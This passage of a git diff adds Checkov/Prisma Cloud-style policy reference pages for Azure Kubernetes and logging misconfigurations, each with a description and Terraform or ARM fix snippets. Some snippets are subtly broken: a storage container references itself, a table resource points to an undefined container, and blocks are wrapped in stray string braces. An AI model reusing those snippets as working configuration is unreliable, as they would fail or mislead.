+*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* private_cluster_enabled + + +[source,go] +---- +{ + " resource "azurerm_kubernetes_cluster" "example" { + ... + + private_cluster_enabled = true + + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-azure-policies-add-on.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-azure-policies-add-on.adoc new file mode 100644 index 000000000..e111f24f2 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-azure-policies-add-on.adoc @@ -0,0 +1,58 @@ +== AKS does not use Azure policies add-on +// Azure Policy Add-on for Azure Kubernetes Service (AKS) not enabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b09005ec-87f5-47ce-bdff-3480eee73931 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py[CKV_AZURE_116] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Policy Add-on for AKS extends Gatekeeper v3, an admission controller webhook for Open Policy Agent (OPA), to apply at-scale enforcements and safeguards on your clusters in a centralized, consistent manner. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* addon_profile.azure_policy.enabled + + +[source,go] +---- +{ + " resource "azurerm_kubernetes_cluster" "example" { + ... ++ addon_profile { ++ azure_policy { ++ enabled = true + } + + } + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-disk-encryption-set.adoc b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-disk-encryption-set.adoc new file mode 100644 index 000000000..6b3156df5 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-disk-encryption-set.adoc @@ -0,0 +1,55 @@ +== AKS does not use disk encryption set +// Azure Kubernetes Service (AKS) does not use disk encryption set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2b3fa957-1875-4d35-b4b1-2355f04f6ab1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py[CKV_AZURE_117] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Disk encryption is a security measure that encrypts the data on a disk to protect it from unauthorized access or tampering. +When disk encryption is enabled for AKS, it encrypts the data on the disks that are used by the nodes in your cluster. +This can help to protect your data from being accessed or modified by unauthorized users, even if the disks are physically stolen or the data is accessed from an unauthorized location. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_kubernetes_cluster +* *Arguments:* disk_encryption_set_id + + +[source,go] +---- +{ + " resource "azurerm_kubernetes_cluster" "example" { + ... + + disk_encryption_set_id = "someId" + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/azure-logging-policies.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/azure-logging-policies.adoc new file mode 100644 index 000000000..f45587c07 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/azure-logging-policies.adoc @@ -0,0 +1,69 @@ +== Azure Logging Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:bc-azr-logging-1.adoc[Azure Network Watcher Network Security Group (NSG) flow logs retention is less than 90 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py[CKV_AZURE_12] +|MEDIUM + + +|xref:bc-azr-logging-2.adoc[Azure SQL Server auditing policy is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/SQLServerAuditingEnabled.py[CKV_AZURE_23] +|HIGH + + +|xref:bc-azr-logging-3.adoc[Azure SQL Server audit log retention is not greater than 90 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_24] +|HIGH + + +|xref:enable-requests-on-storage-logging-for-queue-service.adoc[Azure storage account logging for queues is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py[CKV_AZURE_33] +|MEDIUM + + +|xref:ensure-audit-profile-captures-all-activities.adoc[Azure Monitor log profile does not capture all activities] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MonitorLogProfileCategories.py[CKV_AZURE_38] +|LOW + + +|xref:ensure-storage-logging-is-enabled-for-blob-service-for-read-requests.adoc[Azure storage account logging setting for blobs is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml[CKV2_AZURE_21] +|LOW + + +|xref:ensure-storage-logging-is-enabled-for-table-service-for-read-requests.adoc[Azure storage account logging setting for tables is disabled] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml[CKV2_AZURE_20] +|LOW + + +|xref:ensure-that-app-service-enables-failed-request-tracing.adoc[App service does not enable failed request tracing] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py[CKV_AZURE_66] +|LOW + + +|xref:ensure-that-app-service-enables-http-logging.adoc[App service does not enable HTTP logging] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py[CKV_AZURE_63] +|LOW + + +|xref:ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible.adoc[Azure Storage account container storing activity logs is publicly accessible] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml[CKV2_AZURE_8] +|MEDIUM + + +|xref:set-activity-log-retention-to-365-days-or-greater.adoc[Activity Log Retention should not be set to less than 365 days] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py[CKV_AZURE_37] +|MEDIUM + + +|xref:tbdensure-that-app-service-enables-detailed-error-messages.adoc[App service disables detailed error messages] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py[CKV_AZURE_65] +|LOW + + +|=== + diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-1.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-1.adoc new file mode 100644 index 000000000..05153636f --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-1.adoc @@ -0,0 +1,91 @@ +== Azure Network Watcher Network Security Group (NSG) flow logs retention is less than 90 days +// Azure Network Watcher Network Security Group (NSG) flow logs retention less than 90 days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 09fcb4f7-59f3-4101-a717-d4f5a5235067 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py[CKV_AZURE_12] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Flow logs enable capturing information about IP traffic flowing in and out of network security groups. +Logs can be used to check for anomalies and give insight into suspected breaches. +We recommend your Network Security Group (NSG) Flow Log *Retention Period* is set to greater than or equal to 90 days. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Network Watcher* > * Logs* section. + +. Select the * NSG flow logs* blade. + +. For each Network Security Group in the list: a) Set * Status* to * On*. ++ +b) Set * Retention (days)* to * greater than 90 days*. ++ +c) In * Storage account* select your _storage account_. ++ +d) Click * Save*. + + +* CLI Command* + + +To enable the * NSG flow logs * and set the * Retention (days)* to * greater than or equal to 90 days*, use the following command: +---- +az network watcher flow-log configure +--nsg & lt;NameorID of the Network Security Group> +--enabled true +--resource-group & lt;resourceGroupName> +--retention 91 +--storage-account & lt;NameorID of the storage account to save flow logs> +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_network_watcher_flow_log +* *Arguments:* days + + +[source,go] +---- +resource "azurerm_network_watcher_flow_log" "test" { + ... ++ retention_policy { ++ enabled = true ++ days = <90 or greater> + } +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-2.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-2.adoc new file mode 100644 index 000000000..0017c14e1 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-2.adoc @@ -0,0 +1,137 @@ +== Azure SQL Server auditing policy is disabled +// Azure SQL Server audit policy disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8a97eb53-4a04-45d6-9f2d-af3b7eb8317b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/SQLServerAuditingEnabled.py[CKV_AZURE_23] + +|Severity +|HIGH + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The Azure platform allows a SQL server to be created as a service. +Auditing tracks database events and writes them to an audit log in the Azure storage account. +It also helps to maintain regulatory compliance, understand database activity, and gain insight into discrepancies and anomalies that could indicate business concerns or suspected security violations. +We recommend you enable auditing at the server level, ensuring all existing and newly created databases on the SQL server instance are audited. + +NOTE: An auditing policy applied to a SQL database does not override an auditing policy or settings applied on the SQL server where the database is hosted. + +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * SQL servers*. + +. For each server instance: a) Click * Auditing*. ++ +b) Set * Auditing* to * On*. + + +* CLI Command* + + +To get the list of all SQL Servers, use the following command: `Get-AzureRmSqlServer` +To enable auditing for each Server, use the following command: +---- +Set-AzureRmSqlServerAuditingPolicy +-ResourceGroupName & lt;resource group name> +-ServerName & lt;server name> +-AuditType & lt;audit type> +-StorageAccountName & lt;storage account name> +---- +//// + +=== Fix - Buildtime + + +*ARM* + + +* *Resource:* Microsoft.Sql/servers/databases + + +[source,json] +---- +{ + "type": "Microsoft.Sql/servers", + "apiVersion": "2019-06-01-preview", + "location": "[parameters('location')]", + "name": "[parameters('sqlServerName')]", + "identity": "[if(parameters('isStorageBehindVnet'), json('{\"type\":\"SystemAssigned\"}'), json('null'))]", + "properties": { + "administratorLogin": "[parameters('sqlAdministratorLogin')]", + "administratorLoginPassword": "[parameters('sqlAdministratorLoginPassword')]", + "version": "12.0" + }, + "tags": { + "displayName": "[parameters('sqlServerName')]" + }, + "resources": [ + { + "type": "auditingSettings", + "apiVersion": "2019-06-01-preview", + "name": "DefaultAuditingSettings", + "dependsOn": [ + "[parameters('sqlServerName')]", + "[parameters('storageAccountName')]", + "[extensionResourceId(resourceId('Microsoft.Storage/storageAccounts', parameters('storageAccountName')), 'Microsoft.Authorization/roleAssignments/', variables('uniqueRoleGuid'))]" + ], + "properties": { ++ "state": "Enabled", + "storageEndpoint": "[reference(resourceId('Microsoft.Storage/storageAccounts', parameters('storageAccountName')), '2019-06-01').PrimaryEndpoints.Blob]", + "storageAccountAccessKey": "[if(parameters('isStorageBehindVnet'), json('null'), listKeys(resourceId('Microsoft.Storage/storageAccounts', parameters('storageAccountName')), '2019-06-01').keys[0].value)]", + "storageAccountSubscriptionId": "[subscription().subscriptionId]", + "isStorageSecondaryKeyInUse": false + } + } + ] +} +---- + + +*Terraform* + + +* *Resource:* azurerm_sql_server, azurerm_mssql_server +* *Field:* extended_auditing_policy + + +[source,go] +---- +resource "azurerm_sql_server" "example" { + ... + + extended_auditing_policy { + storage_endpoint = azurerm_storage_account.example.primary_blob_endpoint + storage_account_access_key = azurerm_storage_account.example.primary_access_key + storage_account_access_key_is_secondary = true + retention_in_days = 90 + } +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-3.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-3.adoc new file mode 100644 index 000000000..f9230b976 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/bc-azr-logging-3.adoc @@ -0,0 +1,91 @@ +== zure SQL Server audit log retention is not greater than 90 days +// Azure SQL Server audit logs retention less than 90 days + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6b2bdb87-2865-4348-af5d-0b766186bc9d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/common/graph/checks_infra/base_check.py[CKV_AZURE_24] + +|Severity +|HIGH + +|Subtype +|Build +// ,Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Audit Logs can be used to check for anomalies and give insight into suspected breaches or misuse of information and access. +We recommend you configure SQL server audit retention to be greater than 90 days. + +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. ++ +2 Navigate to * SQL servers*. + +. For each server instance: a) Click * Auditing*. ++ +b) Select * Storage Details*. ++ +c) Set * Retention (days) * to * greater than 90 days*. ++ +d) Click * OK*. ++ +e) Click * Save*. + + +* CLI Command* + + +To set the retention policy for more than or equal to 90 days, for each server, use the following command: +---- +set-AzureRmSqlServerAuditing +-ResourceGroupName & lt;resource group name> +-ServerName & lt;server name> +-RetentionInDays & lt;Number of Days to retain the audit logs, should be 90days minimum> +---- +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_sql_server, azurerm_mssql_server +* *Arguments:* retention_in_days* + + +[source,go] +---- +resource "azurerm_sql_server" "example" { + ... + extended_auditing_policy { + storage_endpoint = azurerm_storage_account.example.primary_blob_endpoint + storage_account_access_key = azurerm_storage_account.example.primary_access_key + storage_account_access_key_is_secondary = true + + retention_in_days = <90 or greater> + } +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/enable-requests-on-storage-logging-for-queue-service.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/enable-requests-on-storage-logging-for-queue-service.adoc new file mode 100644 index 000000000..4db7ce69e --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/enable-requests-on-storage-logging-for-queue-service.adoc @@ -0,0 +1,129 @@ +== Azure storage account logging for queues is disabled +// Azure Queue Storage Service Account logging for queues disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| fde9482f-3ac2-43f6-bda2-bf2013074acd + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py[CKV_AZURE_33] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +The *Azure Queue Storage* service stores messages that may be read by any client with access to the storage account. +A queue may contain an unlimited number of messages, each of which can be up to 64KB in size when using version 2011-08-18 or newer. +*Storage Logging* takes place server-side recording details in the storage account for both successful and failed requests. +These logs allow users to see the details of read, write, and delete operations against the queues. +*Storage Logging* log entries contain the following information about individual requests: timing information, for example start time, end-to-end latency, server latency, authentication details, concurrency information, and the size of request and response messages. +*Storage Analytics* logs contain detailed information about successful and failed requests to a storage service. +This information can be used to monitor individual requests and to diagnose issues with a storage service. +Requests are logged on a best-effort basis. +*Storage Analytics* logging is not enabled by default for your storage account. +//// +=== Fix - Runtime + + +* Azure Portal To change the policy using the Azure Portal, follow these steps:* + + + +. Log in to the Azure Portal at https://portal.azure.com. + +. Navigate to * Storage Accounts*. + +. Select the specific * Storage Account*. + +. From the * Monitoring* (classic) section, select the * Diagnostics logs* (classic) blade. + +. Set the * Status* to * On*. + +. Select * Queue properties*. + +. Navigate to the * Logging* section to enable * Storage Logging for Queue service*. + +. Select * Read*, * Write* and * Delete* options. + + +* CLI Command* + + +To enable the * Storage Logging for Queue service*, use the following command: `az storage logging update --account-name & lt;storageAccountName> --account-key & lt;storageAccountKey> --services q --log rwd --retention 90 ` +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account +* *Arguments:* logging + hour_metrics + minute_metrics + + +[source,go] +---- +{ + "resource "azurerm_storage_account" "example" { + name = "example" + resource_group_name = data.azurerm_resource_group.example.name + location = data.azurerm_resource_group.example.location + account_tier = "Standard" + account_replication_type = "GRS" + queue_properties { ++ logging { + delete = true + read = true + write = true + version = "1.0" + retention_policy_days = 10 + } + + } +}", + +} +---- + +The *logging* field should be enough to enable logging. +As Terraform apply might fail, it is recommended to also configure the *hour_metrics* and *minute_metrics* fields. + + +[source,go] +---- +{ + "+ hour_metrics { + enabled = true + include_apis = true + version = "1.0" + retention_policy_days = 10 + } + ++ minute_metrics { + enabled = true + include_apis = true + version = "1.0" + retention_policy_days = 10 + }", + + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-audit-profile-captures-all-activities.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-audit-profile-captures-all-activities.adoc new file mode 100644 index 000000000..a5fe313c7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-audit-profile-captures-all-activities.adoc @@ -0,0 +1,73 @@ +== Azure Monitor log profile does not capture all activities +// Azure Monitor log profile not configured to collect logs for all categories + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 64f0ec41-cdcb-42e4-b556-eb66946a62ff + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/arm/checks/resource/MonitorLogProfileCategories.py[CKV_AZURE_38] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +A log profile controls how the activity log is exported. +Configuring the log profile to collect logs for the categories *Write*, *Delete* and *Action* ensures that all control/management plane activities performed on the subscription are exported. +We recommend you configure the log profile to export all activities from the control/management plane. +//// +=== Fix - Runtime + + +* Azure Portal The Azure portal currently has no provision to check or set categories.* + + + + +* CLI Command* + + +To update an existing default log profile, use the following command: `az monitor log-profiles update --name default` +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_monitor_log_profile +* *Arguments:* categories + + +[source,go] +---- +{ + "resource "azurerm_monitor_log_profile" "example" { + ... + categories = [ + + "Action", + + "Delete", + + "Write", + ] +}", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-blob-service-for-read-requests.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-blob-service-for-read-requests.adoc new file mode 100644 index 000000000..26a3eb6fe --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-blob-service-for-read-requests.adoc @@ -0,0 +1,98 @@ +== Azure storage account logging setting for blobs is disabled +// Azure storage account logging setting for blobs disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 02cd347f-9091-4cb3-a221-e9f0e1cebabf + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml[CKV2_AZURE_21] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +The Storage Blob service provides scalable, cost-efficient objective storage in the cloud. +Storage Logging happens server-side and allows details for both successful and failed requests to be recorded in the storage account. +These logs allow users to see the details of read, write, and delete operations against the blobs. +Storage Logging log entries contain the following information about individual requests: Timing information such as start time, end-to-end latency, and server latency, authentication details , concurrency information and the sizes of the request and response messages. +Storage Analytics logs contain detailed information about successful and failed requests to a storage service. +This information can be used to monitor individual requests and to diagnose issues with a storage service. +Requests are logged on a best-effort basis. +We recommend that you ensure Storage Logging is enabled for Blob Service for Read Requests + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_log_analytics_workspace, azurerm_storage_account, azurerm_log_analytics_storage_insights,azurerm_storage_container + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "resource_group_ok" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_log_analytics_workspace" "analytics_workspace_ok" { + name = "exampleworkspace" + location = azurerm_resource_group.resource_group_ok.location + resource_group_name = azurerm_resource_group.resource_group_ok.name + sku = "PerGB2018" + retention_in_days = 30 +} + + +resource "azurerm_storage_account" "storage_account_ok" { + name = "examplestoracc" + resource_group_name = azurerm_resource_group.resource_group_ok.name + location = azurerm_resource_group.resource_group_ok.location + account_tier = "Standard" + account_replication_type = "LRS" +} + + +resource "azurerm_log_analytics_storage_insights" "analytics_storage_insights_ok" { + name = "example-storageinsightconfig" + resource_group_name = azurerm_resource_group.resource_group_ok.name + workspace_id = azurerm_log_analytics_workspace.analytics_workspace_ok.id + + storage_account_id = azurerm_storage_account.storage_account_ok.id + storage_account_key = azurerm_storage_account.storage_account_ok.primary_access_key + blob_container_names= ["blobExample_ok"] +} + + +resource "azurerm_storage_container" "storage_container_ok" { + name = "my-awesome-content.zip" + storage_account_name = azurerm_storage_account.storage_account_ok.name + storage_container_name = azurerm_storage_container.storage_container_ok.name + container_access_type = "blob" +} + + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-table-service-for-read-requests.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-table-service-for-read-requests.adoc new file mode 100644 index 000000000..4de734781 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-storage-logging-is-enabled-for-table-service-for-read-requests.adoc @@ -0,0 +1,96 @@ +== Azure storage account logging setting for tables is disabled +// Azure storage account logging setting for tables disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| cf24f5cf-c1c0-4029-943f-b61620a7d893 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml[CKV2_AZURE_20] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform, TerraformPlan + +|=== + + + +=== Description + + +The Storage Table storage is a service that stores structure NoSQL data in the cloud, providing a key/attribute store with a schema less design. +Storage Logging happens server- side and allows details for both successful and failed requests to be recorded in the storage account. +These logs allow users to see the details of read, write, and delete operations against the tables. +Storage Logging log entries contain the following information about individual requests: Timing information such as start time, end-to-end latency, and server latency, authentication details , concurrency information and the sizes of the request and response messages. +Storage Analytics logs contain detailed information about successful and failed requests to a storage service. +This information can be used to monitor individual requests and to diagnose issues with a storage service. +Requests are logged on a best-effort basis. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_log_analytics_workspace, azurerm_storage_account, azurerm_log_analytics_storage_insights, azurerm_storage_table + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "blobExample_ok" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_log_analytics_workspace" "blobExample_ok" { + name = "exampleworkspace" + location = azurerm_resource_group.blobExample_ok.location + resource_group_name = azurerm_resource_group.blobExample_ok.name + sku = "PerGB2018" + retention_in_days = 30 +} + + +resource "azurerm_storage_account" "blobExample_ok" { + name = "examplestoracc" + resource_group_name = azurerm_resource_group.blobExample_ok.name + location = azurerm_resource_group.blobExample_ok.location + account_tier = "Standard" + account_replication_type = "LRS" +} + + +resource "azurerm_log_analytics_storage_insights" "blobExample_ok" { + name = "example-storageinsightconfig" + resource_group_name = azurerm_resource_group.blobExample_ok.name + workspace_id = azurerm_log_analytics_workspace.blobExample_ok.id + + storage_account_id = azurerm_storage_account.blobExample_ok.id + storage_account_key = azurerm_storage_account.blobExample_ok.primary_access_key + table_names = ["myexampletable_ok"] +} + + +resource "azurerm_storage_table" "blobExample_ok" { + name = "myexampletable_ok" + storage_account_name = azurerm_storage_account.blobExample_ok.name + storage_container_name = azurerm_storage_container.blobExample_ok.name +} + + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-failed-request-tracing.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-failed-request-tracing.adoc new file mode 100644 index 000000000..3eae3df43 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-failed-request-tracing.adoc @@ -0,0 +1,58 @@ +== App service does not enable failed request tracing +// Failed request tracing disabled for Azure App Services + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 89c672d6-7436-4eb7-9565-e84ab87edc6c + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py[CKV_AZURE_66] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +By enabling failed request tracing for your app service, you can collect this information and use it to troubleshoot issues with your app and identify potential problems. +This can help to ensure that your app is running smoothly and is able to handle any errors that might occur. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* logs.failed_request_tracing_enabled + + +[source,go] +---- +{ + " resource "azurerm_app_service" "example" { + ... + + logs { + + failed_request_tracing_enabled = true + } + + ... + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-http-logging.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-http-logging.adoc new file mode 100644 index 000000000..a60ac05cf --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-that-app-service-enables-http-logging.adoc @@ -0,0 +1,75 @@ +== App service does not enable HTTP logging +// HTTP logging disabled for Azure App Services + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 18aec02c-ae0e-4e2c-9e6f-72820d1b2909 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py[CKV_AZURE_63] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +By enabling HTTP logging for your app service, you can collect this information and use it to monitor and troubleshoot your app, as well as identify any potential security issues or threats. +This can help to ensure that your app is running smoothly and is secure from potential attacks. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_app_service +* *Arguments:* logs.http_logs + + +[source,go] +---- +{ + " resource "azurerm_app_service" "example" { + name = "example-app-service" + location = azurerm_resource_group.example.location + resource_group_name = azurerm_resource_group.example.name + app_service_plan_id = azurerm_app_service_plan.example.id + ++ logs { ++ http_logs { + retention_in_days = 4 + retention_in_mb = 10 + } + + } + + app_settings = { + "SOME_KEY" = "some-value" + } + + + connection_string { + name = "Database" + type = "SQLServer" + value = "Server=some-server.mydomain.com;Integrated Security=SSPI" + } + + }", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible.adoc b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible.adoc new file mode 100644 index 000000000..3f253ec32 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-logging-policies/ensure-the-storage-container-storing-the-activity-logs-is-not-publicly-accessible.adoc @@ -0,0 +1,95 @@ +== Azure Storage account container storing activity logs is publicly accessible +// Azure Storage account container storing activity logs publicly accessible + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8a2315b0-70b9-477b-bd5c-41cb92a7b726 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml[CKV2_AZURE_8] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The storage account container containing the activity log export should not be publicly accessible. +Allowing public access to activity log content may aid an adversary in identifying weaknesses in the affected account's use or configuration. + +Configuring container Access policy to *private* will remove access from the container for everyone except owners of the storage account. + +Access policy needs to be set explicitly in order to allow access to other desired users. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_container, azurerm_storage_account, azurerm_monitor_activity_log_alert +* *Arguments:* container_access_type (of _azurerm_storage_container)_ + + +[source,go] +---- +{ + "resource "azurerm_storage_container" "ok_container" { + name = "vhds" + storage_account_name = azurerm_storage_account.ok_account.name ++ container_access_type = "private" +} + + +resource "azurerm_storage_account" "ok_account" { + name = "examplesa" + resource_group_name = azurerm_resource_group.main.name + location = azurerm_resource_group.main.location + account_tier = "Standard" + account_replication_type = "GRS" +} + + +resource "azurerm_monitor_activity_log_alert" "ok_monitor_activity_log_alert" { + name = "example-activitylogalert" + resource_group_name = azurerm_resource_group.main.name + scopes = [azurerm_resource_group.main.id] + description = "This alert will monitor a specific storage account updates." + + criteria { + resource_id = azurerm_storage_account.ok_account.id + operation_name = "Microsoft.Storage/storageAccounts/write" + category = 